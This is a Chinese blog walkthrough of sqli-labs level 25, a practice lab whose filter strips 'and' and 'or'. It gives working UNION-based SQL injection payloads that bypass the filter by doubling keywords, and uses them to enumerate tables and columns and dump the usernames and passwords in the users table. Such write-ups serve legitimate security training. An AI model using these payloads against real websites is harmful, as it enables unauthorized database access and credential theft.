sqli-labs关卡25(基于get提交的过滤and和or的联合注入)

文章目录

  • 前言
  • 一、回顾上一关知识点
  • 二、靶场第二十五关通关思路
    • 1、判断注入点
    • 2、爆字段个数
    • 3、爆显位位置
    • 4、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关是过滤了注释符,导致单引号不能被过滤掉而闭合,得通过构造and '1'='1or '1'='1在payload后面才能成功把多余的单引号闭合。这一关是过滤了and和or,让我们看看如何绕过。

二、靶场第二十五关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

打开二十五关,发现是get提交的注入类型,老规矩用万能语句and 1=1和 and 1=2测试,发现回显正常,还发现语句返回页面的时候and被过滤了,这里说明这一关是过滤掉and和or了.( 如图所示)
sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第1张图片
为了进一步猜想是不是过滤了and和or我们看看源码,发现and和or被替换为空了(如图所示)
sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第2张图片
这里我们有三种方法绕过and,
第一种是双写and
因为它把and替换为空,而且只过滤一次。如果是anandd的话经过后端过滤应该变成and。
第二种是利用逻辑运算符
and对应的机器语言是&&,or对应的是||
第三种是用url编码
and对应的机器语言是&&,若&&无法绕过,可以试着利用&的url编码绕过,&&url编码为%26%26。当然&&能绕过更好。
绕过的方法有很多这里不多举例,这里我用双写绕过。
最终发现是单引号闭合,payload为(如图所示)

id=1' anandd 1=1--+
id=1' anandd 1=2--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第3张图片
sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第4张图片

2、爆字段个数

发现4的时候报错,说明只有三个字段
payload为

id=1' oorrder by 4--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第5张图片

3、爆显位位置

payload为

id=1' union select 1,2,3--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第6张图片

4、爆数据库名

payload为

id=-1' union select 1,user(),database()--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第7张图片

5、爆数据库表名

payload为

id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第8张图片

6、爆数据库列名

payload为

id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name="users"--+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第9张图片

7、爆数据库数据

payload为

id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users --+

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)_第10张图片


总结

这一关是过滤了and和or,过滤的方法很多,有双写、url编码、&&绕过等等。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

你可能感兴趣的:(web安全,sql)